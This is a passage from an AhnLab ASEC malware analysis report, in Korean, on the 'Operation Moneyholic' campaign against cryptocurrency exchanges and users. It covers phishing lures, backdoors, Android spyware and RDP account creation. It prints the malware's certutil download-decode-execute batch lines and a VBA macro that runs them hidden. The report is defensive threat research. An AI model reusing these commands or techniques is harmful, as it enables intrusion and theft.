Operation Moneyholic 금전적이득을목적으로한최신표적공격사례분석 ASEC 대응팀 경기도성남시분당구판교역로 220 ( 우 ) 대표전화 : 팩스 : Ah
|
|
- 진혁 남
- 5 years ago
- Views:
Transcription
1 Operation Moneyholic 금전적이득을목적으로한최신표적공격사례분석 ASEC 대응팀 경기도성남시분당구판교역로 220 ( 우 ) 대표전화 : 팩스 : AhnLab, Inc. All rights reserved.
2 목차 개요... 3 악성코드상세분석 파일명의이중확장자및공백 다양한기법을이용한위장용문서파일제작 아마데이 (Amadey) 백도어 계속되는악성코드변화 (2019 년상반기 ) 추가악성코드종류및특징 악성코드프로파일링 악성코드비교 악성코드유포지와문자열 Jerry 동일한 C&C, 두개의흔적 문자열 Jhon 또는 John 결론 안랩제품대응현황 IoC (Indicators of Compromise) 별첨 AhnLab, Inc. All rights reserved. 2
3 개요 한때세계적인투기열풍이불었던암호화폐 (Cryptocurrency) 는각국의암호화폐정책이나경기변화의영 향으로등락을반복하고있지만, 투자아이템으로자리를잡았다는것이중론이다. 암호화폐가투자자산으로인기를얻기시작하면서다수의해킹조직들도암호화폐에관심을보이기시작했다. 이들은복구비용으로암호화폐를요구하는랜섬웨어를시작으로, 암호화폐를채굴 (mining) 하는마이너 (Miner, 또는 Coin miner), 크랩토재킹 (Cryptojacking) 등암호화폐탈취를위해다양한형태의악성코드를제작, 유포하고있다. 또국내외주요암호화폐거래소를공격하거나암호화폐사용자의계정을해킹하는사건도심심치않게발생하고있다. 안랩은지난 2018 년초부터암호화폐거래소와이용자를노리는악성코드와표적공격의징후를포착하고, 이를오퍼레이션머니홀릭 (Operation Moneyholic) 으로명명했다. 본보고서에는암호화폐탈취를통해금전적이득을얻기위해유포된악성코드의주요특징과변화를분석 하는한편, 특정국가에서운영하고있는해킹조직과의관련성에대해기술적인근거를살펴본다. AhnLab, Inc. All rights reserved. 3
4 악성코드상세분석 2018 년 2 월부터 2019 년 8 월현재까지오퍼레이션머니홀릭조직이사용한악성코드를분석한결과, 주요공 격대상은암호화폐거래소와이용자로좁혀졌다. 오퍼레이션머니홀릭이사용한주요악성코드의특징 과변화는다음과같다. 1. 파일명의이중확장자및공백 2018 년중 후반까지이메일첨부파일형태로유포된악성코드는 [ 표 1] 과같이크게두가지형태가 존재하는데, 공통적으로파일명에이중확장자를사용하거나확장자사이에공백을적용했다. 파일명 유형 1 WXB 코인배정내용 - 송부용.xlsx.exe 유형 2 *** 조직 3 차 -5 차마지막 BCOT 구매리스트및수량계산확인.hwp.exe [ 표 1] 이중확장자및공백을사용한악성코드 [ 표 1] 의유형 1 과유형 2 의파일명에서첫번째확장자 ( 각각.xlsx,.hwp) 는공격대상 ( 수신자 ) 의의심을 피하기위해문서파일로위장한것으로, 실제확장자는뒤에나오는두번째확장자 (.exe) 이다. 공격대 상이메일에첨부된이들파일을실행하면 [ 그림 1] 과같은과정으로동작한다. AhnLab, Inc. All rights reserved. 4
5 [ 그림 1] 악성코드동작과정 [ 표 1] 의악성코드는유형에따라다음과같은특징을갖고있다. (1) 유형 1: 정상파일생성및악성코드다운로드유형 1의악성코드 ( 파일 ) 이실행되면내부에존재하는정상파일을생성하여공격대상에게보여준다. 이때 [ 그림 2] 와같이이메일에첨부된악성파일의첫번째확장자와코드를비교해생성할정상파일의확장자를결정한다. [ 그림 2] 유형 1 의악성파일 (.xlsx{ 공백 }.exe) 의정상파일 (xls) 생성과정 AhnLab, Inc. All rights reserved. 5
6 유형 1의파일 ( WXB 코인배정내용 - 송부용.xlsx{ 공백 }.exe ) 이생성한정상파일 (.xls) 에는암호화폐거래소로추정되는회사의임직원개인정보와각임직원별암호화폐보유현황이기록되어있었다. 생성된정상파일 (.xls) 에기록된내용이실제로유효한내용인지확인할수없었지만, 공격자가임의로작성했다기보다해킹등을통해획득한내용으로추정된다. 또한, [ 그림 1] 의동작과정중메일에첨부된악성파일실행시다운로드되는 1.txt 파일은배치파일 (batch file) 로, [ 표 2] 와같이운영체제에따라악성코드를추가로다운로드한다. :32BITOS certutil urlcache split f > nul certutil decode f setup1.txt setup.cab > nul del /f /q setup1.txt > nul GOTO ISEXIST :64BITOS certutil urlcache split f > nul certutil decode f setup2.txt setup.cab > nul del /f /q setup2.txt > nul GOTO ISEXIST [ 표 2] 유형 1 의배치파일 (1.txt) 정보 1.txt 배치파일에의해다운로드된 setup1.txt( 또는 setup2.txt) 파일은 cab 파일이다. 해당파일은 BASE64 로암호화되어있으며, 복호화하면 [ 그림 3] 와같이내부에압축파일이존재하고있음을알수 있다. AhnLab, Inc. All rights reserved. 6
7 [ 그림 3] BASE64 로암호화된 setup1.txt [ 그림 3] 에서볼수있는것처럼 setupt1.txt 파일에는 4 개의파일이포함되어있는데, 그중핵심은 TiWorker.exe 이다. TiWorker.exe 파일은백도어기능을수행하며, 나머지 3 개의파일은 TiWorker.exe 를실행 하기위한보조기능을수행한다. 파일명 기능 install.bat NTWDBLIB.dll update.dll TiWorker.exe가외부와통신하도록윈도우방화벽의 in/outbound 정책에추가 HKCU\Software\Microsoft\Windows\CurrentVersion\Run에추가 윈도우 7 이하에서정상파일 cliconfg와함께실행 -> install.bat 실행, UAC Bypass 윈도우 10에서 install.bat 실행, UAC Bypass [ 표 3] 보조파일의기능정보 TiWorker.exe 는온라인에소스코드가공개된중국산백도어를기반으로제작되었으며, C&C 서버와통신할 때 [ 그림 4] 와같이특정시그니처 (fxftest) 를전송한다. AhnLab, Inc. All rights reserved. 7
8 [ 그림 4] TiWorker.exe 소스코드및 C&C 통신패킷 [ 표 4] 는분석을통해확인한 TiWorker.exe 파일의주요기능을정리한것이다. 명령 설명 case 1 GetDriver(sktClient); 논리드라이브목록 case 2 ListFile(sktClient,mycommand.Parameter); 파일리스트 case 3 RunProc(sktClient,mycommand.Parameter); 파일실행 : WinExec(path,SW_HIDE); case 4 DelFile(sktClient,mycommand.Parameter); 파일삭제 : DeleteFile(path) case 5 DownFile(sktClient); 파일생성 : CreateFile() case 6 UpFile(sktClient,mycommand.Parameter); 파일업로드 : CreateFile(), CreateFileMapping() case 7 ListProc(sktClient); 프로세스리스트 : CreateToolhelp32Snapshot() case 8 KillProc(sktClient,mycommand.Parameter); 프로세스종료 : TerminateProcess() case 9 CreateCmd(sktClient); cmd.exe 실행 : CreateProcess(() case 10 RunCmd(sktClient,mycommand.Parameter); cmd.exe 실행 : WriteFile() case 11 CloseCmd(sktClient); cmd.exe 핸들종료 case 12 TestConnect(sktClient); C&C 서버와통신테스트 [ 표 4] TiWorker.exe 의백도어기능 AhnLab, Inc. All rights reserved. 8
9 (2) 유형 2: 정상파일생성및악성코드다운로드유형 2의악성파일은유형 1의파일과는조금다르게동작한다. 유형 1은공격대상에게보여주기위한위장용정상파일을자기내부에갖고있었으나, 유형 2는 C&C 서버에서 BASE64로암호화된정상파일과악성코드를다운로드한다. 정상한글파일다운로드 "certutil -urlcache -split -f %temp%/4.txt && certutil -decode - f %temp%/4.txt \"%cd%/*** 조직 3차 -5차마지막 BCOT 구매리스트및수량계산확인.hwp\" && start \"C:\\Program Files (x86)\\hnc\\hwp80\\hwp.exe\" \"*** 조직 3차 -5차마지막 BCOT 구매리스트및수량계산확인.hwp\" 악성코드다운로드 copy /Y %windir%\system32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split - f && ct -decode-f 1.txt 1.bat && del /f /q 1.txt && 1.bat [ 표 5] 유형 2 의배치파일 (1.txt) 정보 [ 표 5] 의 11.txt 파일은 BASE64 로암호화되어있으며, 복호화하면암호화폐와관련된내용의정상적인 한글파일이나타난다. 특이한점은파일의지은이 ( 작성자 ), 즉해당파일을생성한이가 ASPNET 계정을 사용했다는것이다. [ 그림 5] 11.txt 파일정보 AhnLab, Inc. All rights reserved. 9
10 해당계정은 TiWorker.exe 를통해추가유포된악성코드 (DnsCacheUpdate.dll 등 ) 가감염 PC 에생성하는 원격데스크톱 (RDP) 계정으로, 이에대한내용은별도로 ((5) 추가악성코드의종류및특징 ) 살펴본다. [ 그림 6] 정상한글파일의지은이정보 attach apps.com에는악성파일 3개 (1.txt ~ 3.txt) 와공격대상에게보여주기위한정상파일 8개 (4.txt ~ 11.txt) 가존재한다. 8개의정상파일은공통적으로암호화폐와관련된내용의문서파일이었으며, 마지막으로저장한사람이 ASPNET 이다. 또 [ 표 6] 과같이작성한날짜가동일하며, 마지막수정날짜 ( 시간 ) 은다소의차이가있다. 파일명작성한날짜마지막수정한날짜 4.txt 2018 년 5 월 21 일월요일오전 11:20: 년 5 월 21 일월요일오후 3:39:52 5.txt 2018 년 5 월 21 일월요일오전 11:20: 년 5 월 21 일월요일오후 3:25:09 6.txt 2018 년 5 월 21 일월요일오전 11:20: 년 5 월 21 일월요일오후 3:36:01 7.txt 2018 년 5 월 21 일월요일오전 11:20: 년 5 월 21 일월요일오후 2:48:53 8.txt 2018 년 5 월 21 일월요일오전 11:20: 년 5 월 21 일월요일오후 3:28:48 9.txt 2018 년 5 월 21 일월요일오전 11:20: 년 5 월 21 일월요일오후 2:56:37 10.txt 2018 년 5 월 21 일월요일오전 11:20: 년 5 월 21 일월요일오후 3:05:58 11.txt 2018 년 5 월 21 일월요일오전 11:20: 년 5 월 21 일월요일오전 11:47:29 [ 표 6] 정상파일의등록정보 AhnLab, Inc. All rights reserved. 10
11 위에서살펴본내용을통해오퍼레이션머니홀릭은 ASPNET 계정으로로그인후정상한글파일 1 개로내 용이다른정상한글문서 7 개를추가로만들었으며, 악성코드유포시공격대상의의심을피하기위해 이들문서파일을보여주었음을알수있다. 한편, 유형 1 의악성파일인 1.txt 는 BASE64 로암호화된배치파일로, [ 표 2] 에서설명한유형 1 의배치 파일 (1.txt) 과동일한기능을수행한다. [ 그림 7] 유형 2 의배치파일 (1.txt) 정보 유형 1 과마찬가지로배치파일 (1.txt) 이다운로드하는파일은압축파일 (cab) 이며, 해당파일의내부에는다 수의악성코드가존재한다. 그중핵심파일은 ipnet.dll 과 ipnet.dll 이참조하는 ipnet.ini 이며, ini 파일에는 AhnLab, Inc. All rights reserved. 11
12 C&C 주소가암호화되어있다. 그러나, 유형 1 의백도어인 TiWorker.exe 는 C&C 서버와 TCP 80 번포트로통 신하는반면, 유형 2 의백도어인 inpnet.dll 은 C&C 서버의 FTP 서비스를사용한다. [ 그림 8] 유형 1 과유형 2 의 cab 파일내부비교 [ 표 7] 은분석을통해확인한 ipnet.dll 의기능을정리한것이다. 명령 설명 case 1 /usr CreateProcessAsUserA(): 프로세스실행 case 2 Pull, /f 파일복사후 C&C로업로드그리고삭제 cmd /c case 3 chip 파일삭제후파일생성 case 4 put 파일복사후삭제 [ 표 7] ipnet.dll 의백도어기능 ipnet.dll 은악성코드제작시간을기준으로 2014 년 5 월 29 일 (11 시 26 분 ) 에처음나타난것으로추정되며, 이메일을통해국내특정기관에유입됐다. 당시국내보안업체에서악성코드정보를공개하면서관련 내용의일부가기사화된바있다. < 관련기사 > 북한위성내용가장한사이버공격용악성코드발견 AhnLab, Inc. All rights reserved. 12
13 [ 그림 9] 2014 년 5 월에유포된악성코드의동작과정 [ 그림 9] 에서 1.scr 이생성한정상문서파일 (DOC) 은북한동해위성발사대건설과관련된내용을포함하 고있었다. temp.zip 에는다수의악성코드가존재하며, 그중 ipnet.dll 은앞서살펴본유형 2 의 cab 파일 ([ 그림 8] 오른쪽 ) 에포함되어있던 ipnet.dll 의변종이다. [ 그림 10] 은 2014 년 5 월에유포된악성코드에포함된 ipnet.dll( 왼쪽 ) 과유형 2 의 cab 파일에포함되어있 던 ipnet.dll( 오른쪽 ) 을비교한것이다 년 5 월의 ipnet.dll 은웹통신을, 유형 2 의 cab 파일에포함된 ipnet.dll 은 FTP 를통해 C&C 와통신한다는점에서차이를보인다. AhnLab, Inc. All rights reserved. 13
14 [ 그림 10] ipnet.dll 의기능비교 ipnet.dll 변종은오퍼레이션머니홀릭조직이제작한다른악성코드에비해많지않은편이다. [ 그림 11] 은 ipnet.dll 의유사성을기반으로확인한변종현황으로, 2018 년초반까지불규칙적으로소량의변종이유포되었 으나현재는거의유포되지않는것으로나타났다. AhnLab, Inc. All rights reserved. 14
15 [ 그림 11] ipnet.dll 의변종유포추이 2. 다양한기법을이용한위장용문서파일제작 오퍼레이션머니홀릭조직은 2018 년후반부터 DDE, 매크로, 문서취약점 (OLE/Cve 등 ) 을이용해 위장용문서파일을제작, 악성코드를유포했다. [ 그림 12] 2018 년하반기이후의악성코드동작과정 AhnLab, Inc. All rights reserved. 15
16 공격대상 ( 이메일수신자 ) 이첨부된악성파일을실행하면, [ 그림 12] 와같은과정으로악성코드가동작한 다. 이때공격대상 ( 이메일수신자 ) 이악성코드감염을인지할수없도록다음과같이다양한기법을사용해 위장용문서를제작했다. (1) 악성매크로가포함된시트숨기기공격대상이이메일에첨부된 시멘트제품지표분석.doc 파일을열면 [ 그림 13] 과같이빈문서가나타난다. 그러나아무내용도없는것같은이문서의내부에는악성매크로가포함된시트가존재한다 ( 이해를돕기위해 [ 그림 13] 에는숨겨진시트를표시함 ). 공격대상은빈문서로보이는해당파일을단순히잘못된파일로생각하기쉽다. 따라서다수의알림창이나타나면매크로허용을클릭하게되고, 이로써악성매크로가실행되어악성코드를다운로드한다. [ 그림 13] 문서 (.doc) 파일로위장한악성파일의매크로실행과정 (2) 콘텐츠사용 클릭유도를통한악성매크로실행 MS오피스 (MS Office) 프로그램은문서에매크로 (Macro) 가포함되어있을경우, 매크로의정상또는악성여부와상관없이기본적으로차단한다. 그리고노란색타이틀바를표시해사용자에게 콘텐츠사용 여부를묻는다. 공격자들은바로이점을이용해악성매크로가포함된문서를제작, 유포하고있다. AhnLab, Inc. All rights reserved. 16
17 [ 그림 14] 는악성매크로가포함된파일을이용한공격사례로, 해당파일을열면빈문서가나타나며 매크로가차단되어문서내용을볼수없다는식으로공격대상의클릭을유도한다. 공격대상이 콘텐 츠사용 버튼을클릭하면악성매크로가실행된다. [ 그림 14] 문서파일 (.doc) 에포함된악성매크로실행전과후 악성매크로가실행되면 [ 그림 15] 와같은코드에의해문서에존재하는텍스트가검은색으로변경돼문서의내용이나타난다 ([ 그림 14] 의오른쪽 ). 만일 [ 그림 15] 의.Font.ColorIndex = wdblack 부분이.Font.ColorIndex = wdred 라면문서의내용은붉은색으로표시된다. 이때악성코드에감염된사실을인지할수없도록업무와관련된내용이나호기심을자극하는내용의문서를보여준다. [ 그림 15] 매크로에포함된 ColorIndex Property (3) DDE(Dynamic Data Exchange) 악용오퍼레이션머니홀릭조직은악성코드유포시매크로외에도 DDE(Dynamic Data Exchange) 기능을악용했다. MS 워드의 DDE(Dynamic Data Exchange) 는애플리케이션간의데이터업데이트를위한기능으로, 프로그램의취약점이아닌정상적인기능이다. 악성코드가프로그램의정상적인기능을이용하는경우도적지않다. 웹사이트에서다운로드하거나이메일에첨부된워드파일을열었을때 [ 그림 16] 과같은알림창이나타날 AhnLab, Inc. All rights reserved. 17
18 경우, 무조건 예 를클릭해서는안된다. [ 그림 16] 워드프로그램에서 DDE 실행을알리는메시지창 MS 워드파일로위장한악성파일 ( 거래내역.doc) 을열면 [ 그림 17] 과같은메시지가나타난다. 해당메시지를보고간혹문서파일에매크로가존재하는것처럼오해할수있지만, 이는의심을피하기위한단순이미지다. 그러나해당파일 ( 거래내역.doc) 에는매크로가존재하지않으며, 이미지바로아래에붉은색박스로표시된부분이 DDE(Dynamic Data Exchange) 를통해악성코드가삽입된영역이다. 육안으로봤을때는악성코드가삽입된영역에는빈칸과 = 만존재할뿐이다. [ 그림 17] 워드파일 ( 거래내역.doc) 에삽입된악성정보영역 AhnLab, Inc. All rights reserved. 18
19 공격대상이 거래내역.doc 파일을실행하면폴더경로 %TEMP% 에악성스크립트파일 (js) 이생성된다. 생 성된스크립트파일은다시파일 main.txt 을다운로드한다. 다운로드된 main.txt 파일난독화된영역에는 실행파일이존재하며, 이실행파일은특정 URL 에서악성코드를다운로드한다. [ 그림 18] 악성워드파일에삽입된악성스크립트파일및다운로드된 main.txt AhnLab, Inc. All rights reserved. 19
20 한편, 거래내역.doc 파일에서갠드크랩 (GandCrab) 랜섬웨어와유사한점이확인됐다. [ 그림 19] 와같이각각의문서파일을열었을때생성되는악성스크립트파일과특정 URL에서다운로드한난독화된악성스크립트파일의앞부분이유사하다. 이로미루어이들두파일은동일한자동화툴을이용해제작된것으로추정된다. 그러나이것이동일한조직이두파일을제작했음을의미하는것은아니다. [ 그림 19] 오퍼레이션머니홀릭파일 ( 거래내역.doc) 과갠드크랩랜섬웨어관련파일 ( 경찰고시.doc) (4) 악성코드유포지및명령프롬프트경로악성코드유포지를분석한결과, 디렉토리리스팅이존재하는유포지를확인했다. 해당유포지에는 [ 그림 20] 과같이다수의악성코드가존재했다. 파일명은다르지만파일의크기가비슷하며, 업로드된날짜의차이가없다는점으로보아동일한악성매크로생성도구를이용하여제작한것으로추정된다. AhnLab, Inc. All rights reserved. 20
21 [ 그림 20] 3 월 29 일유포지에업로드된악성코드 [ 그림 21] 4 월 1 일유포지에업로드된악성코드 업로드된악성코드는다음과같이동작한다. [ 그림 22] 악성코드동작방식 AhnLab, Inc. All rights reserved. 21
22 매크로는악성행위를수행하는명령문이저장되는변수 smo 와명령문실행을위한명령프롬프트 (CMD) 의경로가저장되는변수 scl 등두개의변수를사용한다. 명령문은 smo 에평문으로저장되어 있으며, scl 은난독화되어기록되어있다. 매크로 Dim smo As String smo = "copy /Y %windir%\system32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split -f && cd /d %TEMP% && ren 1.txt 1.bat && 1.bat" scl = scl + smo nresult = Shell(sCL, vbhide) ActiveDocument.Save End Sub [ 표 8] 변수 smo [ 그림 23] 변수 scl 의복호화과정 AhnLab, Inc. All rights reserved. 22
23 매크로의주기능은명령프롬프트실행하여변수 smo 의명령문을동작시키는것이다. 하지만 [ 표 8] 의 매크로는 x64 환경에서는정상적으로동작하지만 x86 환경에서는동작하지않는다. 그원인은 [ 표 9] 와 같이변수 scl 에잘못된명령프롬프트의경로가저장되어있어실행되지않기때문이다. 변수명 x86 환경 x64 환경 scl C:\Windows C:\Windows\Sysnative\cmd.exe /q /c scl + smo C:\Windowscopy /Y C:\Windows\Sysnative\cmd.exe /q /c copy /Y [ 표 9] 변수 scl 에저장되는정보 정상적인명령프롬프트의경로는 C:\Windows\Sysnative\cmd.exe이다. 그러나 [ 표 9] 에빨간색으로표시된부분과같이 x86에저장된명령프롬프트의경로는 C:\Windows로, 이에따라악성코드가동작할수없다. 오퍼레이션머니홀릭조직이 x86 환경은감염대상에서제외한것이거나 3월 29일과 4월 1일에제작한악성코드를테스트하지않은채유포한것으로추정할수있다. (5) 사회공학기법공격자들은공격대상의관심을유도하고공격의성공률을높이기위해정치, 경제, 문화등사회적관심이높은주제를이용하는사회공학기법 (Social Engineering) 을자주활용한다. 앞서언급한특정악성코드유포지에는최근국내를비롯해해외에서도많은팬덤을형성하고있는아이돌조직 ( 방탄소년단, BTS) 관련내용으로위장한악성압축파일이존재했다. [ 그림 24] 3 월 27 일유포지에존재하는악성코드 해당악성압축파일 (BTS 자료.zip) 내부에는 49 초분량의동영상 1 개와이중확장자를사용하여문서파일 (.docx) 로위장한스크립트파일 (Visual Baisc Script, VBS) 이존재한다 ([ 그림 25]). AhnLab, Inc. All rights reserved. 23
24 [ 그림 25] 악성압축파일 (BTS 자료.zip) 내부에존재하는파일 악성압축파일에포함된파일중악의적인기능을수행하는것은 VBS 파일로, 해당파일이실행되면악성코드를다운로드한다. VBS 파일이다운로드한악성코드가실행되면 [ 그림 26] 과같이 BTS 화보집및스토리북 이라는내용의문서가나타나며, 콘텐츠사용 버튼의클릭을유도한다. 이를통해악성매크로가실행되어추가악성코드를다운로드한다. [ 그림 26] 스크립트파일 (VBS) 과위장용문서파일 (ycy.doc) AhnLab, Inc. All rights reserved. 24
25 3. 아마데이 (Amadey) 백도어 2018 년하반기이후가장눈에띄는변화는 아마데이 (Amadey) 라고불리는봇넷 (Botnet) 을사용한것이다 년하반기부터유포된 cab 파일, 즉 BASE64 로암호화된 txt 파일이복호화된파일에는아마데이 (Amadey) 가포함되어있다. [ 그림 27] 아마데이 (Amadey) 관리패널 아마데이 (Amadey) 는러시아개발자가제작한봇넷악성코드로, 2019년초부터해킹포럼을통해온라인에서판매되고있다. 라이선스비용은추적을피하기위해암호화폐 ( 비트코인 ) 로거래하고있다. 공격자는아마데이봇넷에감염된시스템에원하는파일을다운로드및실행하도록작업명령을내릴수있으며, 감염된시스템의정보도볼수있다. [ 그림 28] 아마데이 (Amadey) 의작업명령패널 오퍼레이션머니홀릭조직이유포한아마데이 (Amadey) 는다음과같은특징을보인다. AhnLab, Inc. All rights reserved. 25
26 (1) 정상파일로위장한외형 오퍼레이션머니홀릭이유포한아마데이 (Amadey) 의외형은 [ 그림 29] 와같이정상파일처럼위장하고있다. 따라서문자열을확인하는방법으로악성여부를확인하기에는어려움이있다. [ 그림 29] Amadey 외형의문자열 아마데이의외형은공통적으로 [ 그림 30] 에붉은색으로표시된부분과같은특징을보인다. 여기에서 VirtualProtect() 로보호되는영역에존재하는데이터는암호화된쉘코드 (Shellcode) 와아마데이 (Amadey) 로 구성되어있다. [ 그림 30] Amadey 외형의특징 (2) 메모리에서실행아마데이의외형은감염 PC에파일로존재하고실행되지만, 실제백도어기능을하는아마데이는 [ 그림 31] 과같이메모리에서실행파일로재구성된후실행된다. 또 [ 그림 31] 의 ❸과같이메인 Custom API를포함한다수의하위 Custom API를사용한다. AhnLab, Inc. All rights reserved. 26
27 [ 그림 31] Amadey 실행과정 (3) 감염 PC 정보확인및추가악성코드다운로드아마데이에서사용하는주요문자열 (C&C 또는설치된백신명 ) 은암호화되어있으며, 자체복호화코드를통해복호화된다. 예들들어, 아마데이의복호화된일부문자열에서백신명이확인되며, 감염 PC에해당백신이설치되어있는지확인한다. 또한확인한결과를아래와같이 FLAG로설정하여 C&C 서버에전송한다. 이는관리자페이지에서감염 PC의백신사용여부및백신명등의현황을파악하기위한목적이다. 아마데이를통해백신무력화기능을탑재한악성코드를추가로유포할가능성도있다. [+] 대상백신리스트 ( 괄호안의숫자는각백신별 FLAG) 설치안됨 (0), AVAST Software(1), Avira(2), Kaspersky Lab(3), ESET(4), Panda Security(5), Doctor Web(6), AVG(7), 360TotalSecurity(8), Bitdefender(9), Norton(10), Sophos(11), Comodo(12) [ 그림 32] 백신설치확인결과를 FLAG 로 C&C 서버에전송 AhnLab, Inc. All rights reserved. 27
28 감염 PC 의백신확인결과가 FLAG 로전송되면 [ 그림 33] 과같이아마데이의관리자메뉴에 AV 탭 에해당 정보가표시된다. [ 그림 33] Amadey 관리자화면에표시된감염 PC 의백신정보 아마데이변종과 C&C 서버 ( 가통신하는패킷을캡쳐하여분석한결 과, 오퍼레이션머니홀릭조직이감염 PC 에추가악성코드 ( 분석당시 x64 용 TiWorker.exe) 를유포한것이 확인되었다. [ 그림 34] C&C 와통신및악성코드 (TiWorker.exe) 다운로드 또한, 아마데이를통해유포된 TiWorker.exe 와 C&C 서버의통신패킷을캡쳐하여분석한결과, [ 그림 35] 와 같이일정한패턴을보였다. [ 그림 35] 감염 PC 와 C&C 의통신패턴 AhnLab, Inc. All rights reserved. 28
29 [ 그림 35] 에서핵심은 3번과 4번단계로, 오퍼레이션머니홀릭조직은감염 PC에암호화폐관련데이터과같이의미있는데이터가존재하면해당데이터를탈취하기위한악성코드를추가로다운로드했다. 또한감염 PC의프로세스목록에가상환경으로의심할만한프로세스가실행중이라면분석용 PC로판단하고분석을방해하기위해 MBR 파괴악성코드를추가로다운로드했다. [ 그림 36] 는안랩의분석당시오퍼레이션머니홀릭조직이가상환경의분석 PC 로 MBR 파괴악성코드를 추가로유포한패킷이다. MBR 파괴악성코드의기능은이후상세히설명한다 ( (5) 추가악성코드종류및 특징 참고 ). [ 그림 36] MBR 악성코드유포패킷 4. 계속되는악성코드변화 (2019 년상반기 ) (1) 정보수집목적의악성코드탑재 2019년 5월부터유포된악성코드 (cab) 에는앞서살펴본백도어 (TIWorker.exe, ipnet.dll 또는 Amadey) 가존재하지않았다. 대신, 운영체제에서지원하는콘솔명령을사용하여감염 PC의파일및폴더리스트, 운영체제및하드웨어사양등의정보를수집하는배치파일과수집한정보를 C&C 서버로전송하는실행파일 Sendfile.exe가확인됐다. AhnLab, Inc. All rights reserved. 29
30 [ 그림 37] 악성코드 (cab) 에포함된배치파일 ( 왼쪽 ) 과 Sendfile.exe( 오른쪽 ) [ 그림 38] C&C 서버로전송되는감염 PC 의프로세스정보 (2) 안드로이드스마트폰공격오퍼레이션머니홀릭조직은윈도우운영체제용악성코드뿐만아니라안드로이드운영체제용악성앱도제작, 유포했다. 악성앱은 [ 그림 39] 와같이윈도우운영체제용악성코드유포지와동일한서버에서발견되었다. AhnLab, Inc. All rights reserved. 30
31 [ 그림 39] 3 월 28 일유포지에업로드된악성앱 악성앱은윈도우운영체제용악성코드와마찬가지로스피어피싱메일을통해유포된것으로추정되며, 공 격대상이사용하는포털사이트에따라 [ 그림 40] 과같은앱으로위장했다. DaumProtect.apk Kakaotalk.apk NaverProtect.apk [ 그림 40] 악성앱 AhnLab, Inc. All rights reserved. 31
32 또한 [ 그림 41] 과같이포털사이트의계정보호를위한보호앱설치페이지로위장했는데, 해당페이지 는 2019 년 3 월 14 일경제작되었다. [ 그림 41] 포털사이트보호앱설치로위장한페이지 [ 그림 41] 의허위페이지에서확인버튼을클릭하면, 연결된웹브라우저의 User-agent 를확인한다. Useragent 가 PC 라면 모바일환경에서만설치가가능합니다 라는메시지를출력하고, User-agent 가모바일이라 면악성앱다운로드링크로연결한다. [ 그림 42] User-agent 별연결과정 AhnLab, Inc. All rights reserved. 32
33 한편, 이들악성앱의서명에사용한인증서에 Jhon 이라는문자열이존재했다. 이와관련된내용은 악성코 드프로파일링 에서상세히살펴본다. 항목 DaumProtect.apk NaverProtect.apk Package Name Serial Number Subject DN Issuer DN app.project.appcheck b CN=Jhon CN=Jhon [ 표 10] 악성앱서명정보 설치된악성앱을실행하면아이콘을숨긴후, 사용자의의심을피하기위해각각의포털사이트정책 (policy) 페이지로연결한다. [ 그림 43] 악성앱이네이버일경우 [ 그림 44] 악성앱이다음일경우 AhnLab, Inc. All rights reserved. 33
34 이후백그라운드상태에서 C&C 서버와통신하며 [ 표 11] 의악성행위를수행한다. 이때탈취한정보는 문서파일 (TXT) 형태로 C&C 서버에전송한다. 항목기능문서파일 (TXT) 정보탈취 명령수행 저장된계정정보연락처정보문자정보설치된앱정보외장 SD카드에저장된파일정보파일업로드 account.txt contact.txt sms_all.txt app.txt sdcard.txt 파일다운로드 파일삭제 문자메시지발송 문자메시지삭제 앱실행 앱설치 앱삭제 [ 표 11] 악성행위정보 AhnLab, Inc. All rights reserved. 34
35 [ 그림 45] C&C 서버로탈취한정보전송 5. 추가악성코드종류및특징 오퍼레이션머니홀릭조직이감염 PC 를선별한기준은확인할수없지만, 일부감염 PC 에다수의악성 코드를추가로설치했다. 추가로설치된악성코드의종류와특징은다음과같다. (1) RDP(Remote Desktop Protocol) 계정생성 [ 그림 46] DnsCacheUpdate.dll 의 RDP 계정생성 DnsCacheUpdate.dll 이감염 PC 에서실행되면, [ 그림 45] 의기능을통해 RDP 계정이생성된다. 이를통해 AhnLab, Inc. All rights reserved. 35
36 외부에서감염 PC에무단으로접속한후악의적인행위를할수있다. 일부감염 PC에서는 RDP 서비스를활성화하기위해오픈소스기반의 RDP Wrapper를사용했다. RDP Wrapper는깃허브 ( 에설치파일과소스가공개되어있어누구나사용할수있다. 해당파일은정상적인목적으로제작된것으로보이지만, 일부버전이악용된사례가있어안랩은이를 Trojan 또는 Unwanted 로진단및삭제하고있다 (V3 제품기준 ). 안랩은일부감염 PC 분석을통해 RDP 계정이생성된이유를확인할수있었다. [ 그림 47] 과같이감염 PC 1 에는 ASPNET 계정이추가되어있었고, 외부에서 RDP를통해해당 PC에접속이가능했다. 그러나앞서살펴본 [ 그림 46] 에표기된비밀번호를사용해로그인하는것은불가능했다. 따라서분석초기에는최초 RDP 로그인후비밀번호를변경한것으로추정했다. [ 그림 47] 감염 PC 1 에추가된 RDP 계정 (ASPNET) 한편, 감염 PC 1 에설치된 V3 를통해 [ 표 12] 와같은진단정보가확인됐다. 일자진단경로진단명 C:\Windows\SysWOW64\Utilman.exe Trojan/Win32.Agent.R [ 표 12] 감염 PC 1 의진단정보 (1) Utilman.exe 은 DnsCacheUpdate.dll 와마찬가지로 ASPNET 계정을생성하는기능을갖고있다. 비밀번호를 추출한후 RDP 를통해감염 PC 1 에접속을시도한결과, 로그인에성공했다. 이를근거로감염 PC 1 에 ASPNET 계정을추가한악성코드는 DnsCacheUpdate.dll 가아닌 Utilman.exe 로판단했다. 감염 PC 1 에설치된 V3 에는 Utilman.exe 진단한이후 [ 표 13] 과같이다수의악성코드를진단및삭제한로 AhnLab, Inc. All rights reserved. 36
